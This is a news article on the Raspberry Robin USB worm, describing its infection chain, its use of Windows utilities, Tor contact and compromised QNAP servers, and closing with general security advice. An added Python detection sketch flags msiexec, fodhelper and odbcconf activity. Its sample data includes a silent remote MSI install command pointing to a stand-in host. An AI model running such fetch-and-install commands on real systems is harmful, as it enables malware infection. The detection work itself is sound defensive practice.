A malware called “Raspberry Robin” has infected hundreds of Windows networks across multiple sectors, according to a private threat intelligence advisory from Microsoft.
Although ransomware attacks often grab the headlines, the risks posed by other malware can be just as serious and are another reason to make sure you are using antivirus software.
The threat group responsible for the malware is currently unknown, as are its motivation and ultimate goal.
The Raspberry Robin worm infects networks
Microsoft has issued a special threat intelligence alert, informing organizations that a worm called Raspberry Robin has reportedly infected “hundreds of Windows networks”.
Raspberry Robin spreads through external removable USB devices. In other words, in order to infect a device, the user has to plug the USB into it and click on the malicious file inside.
The Windows Command Prompt is then abused to execute malicious code on the affected machine, after which the code connects to the command and control server and downloads more malicious files.
Legitimate Windows programs – including utilities like “fodhelper”, “msiexec” and “odbcconf” – are used to execute this code, and the worm then attempts to connect to the Tor network.
Raspberry Robin: A Brief Modern History
The worm dubbed “Raspberry Robin” was first discovered in September 2021 by intelligence analysts at Red Canary, although most activity attributed to the worm has been occurring since January 2022. Security researchers have observed this mostly in technology and manufacturing networks.
Cybersecurity firm Sekoia, which calls it the “QNAP worm”, was also tracking the worm in November last year.
Sekoia said the worm uses “compromised QNAP devices as command and control servers” and notes that it is active on several French networks. However, for a piece of malware that has been investigated by a number of security teams, it remains relatively obscure.
“This worm uses LNK files that take removable device tokens to spread (eg. network shares and USB devices). These LNK files use well-known techniques to download and execute an MSI package containing a malicious library from a compromised device” – Sekoia Security Team.
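The behaviours described above (a Command Prompt launch, then “msiexec”, “fodhelper” or “odbcconf” running code, with an MSI package fetched from a remote device) can be hunted for in process-creation logs. The sketch below is an added example, not code from Microsoft, Red Canary or Sekoia; the event field names, PIDs, paths and the host nas.example.invalid are constructed assumptions.

```python
import re
from pathlib import PureWindowsPath

# Utilities the article names as being used to execute the worm's code.
WATCHED = {"msiexec.exe", "fodhelper.exe", "odbcconf.exe"}
URL_RE = re.compile(r"https?://([^/\s\"']+)", re.IGNORECASE)

def basename(image):
    return PureWindowsPath(image).name.lower()

def ancestors(event, by_pid):
    """Yield parent events up the process tree, stopping on a PID loop."""
    seen, pid = set(), event["ppid"]
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        yield by_pid[pid]
        pid = by_pid[pid]["ppid"]

def triage(events):
    """Flag watched utilities launched under cmd.exe or installing from a URL."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        if name not in WATCHED:
            continue
        chain = [basename(a["image"]) for a in ancestors(e, by_pid)]
        url = URL_RE.search(e["cmdline"]) if name == "msiexec.exe" else None
        from_cmd = "cmd.exe" in chain
        if not (url or from_cmd):
            continue  # e.g. a local MSI install started by a service
        findings.append({"pid": e["pid"], "utility": name, "chain": chain,
                         "remote_host": url.group(1).lower() if url else None,
                         "severity": "high" if url and from_cmd else "medium"})
    return findings

# Constructed sample events (assumed fields; not indicators from any report).
SYS = "C:\\Windows\\System32\\"
SAMPLE = [
    {"pid": 100, "ppid": 4, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": SYS + "cmd.exe", "cmdline": "cmd.exe /c <constructed>"},
    {"pid": 300, "ppid": 200, "image": SYS + "msiexec.exe", "cmdline": "msiexec /q /i http://nas.example.invalid:8080/pkg"},
    {"pid": 400, "ppid": 300, "image": SYS + "odbcconf.exe", "cmdline": "odbcconf.exe <constructed>"},
    {"pid": 500, "ppid": 900, "image": SYS + "msiexec.exe", "cmdline": "msiexec /i C:\\Installers\\app.msi"},
]

if __name__ == "__main__":
    print(*triage(SAMPLE), sep="\n")
```

A "medium" finding on its own is only a lead, since administrators also run these utilities from a command prompt; the "high" case combines a cmd.exe ancestor with an MSI installed from a remote URL.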
As mentioned earlier, Microsoft has noticed that the worm connects to addresses on the Tor network, but whoever is behind it has not really exploited the access gained to the networks it has compromised, despite the worm demonstrating its capabilities and showing that it can use utilities within the Windows operating system.
What’s more, Sekoia noted in their malware report that “its main code is very complex and the infrastructure used is large,” which raises more questions than answers about the nature of the threat itself.
On the other hand, Microsoft says it has found malicious tools related to the worm that have been created since 2019.
Protect yourself from malware
Although such threats seem powerful, vast, and downright intimidating, there are some things companies and individuals can do to protect themselves and reduce the attack surface of a corporate or home network.
The first is to keep employees – and yourself, for that matter – up to date with the latest threats and mandatory internet and data security training.
Second, install reputable antivirus software on your company network. Antivirus software is designed to detect and remove malware, viruses, and other malicious files from computers and networks. All in all, it’s the best defense against this kind of thing.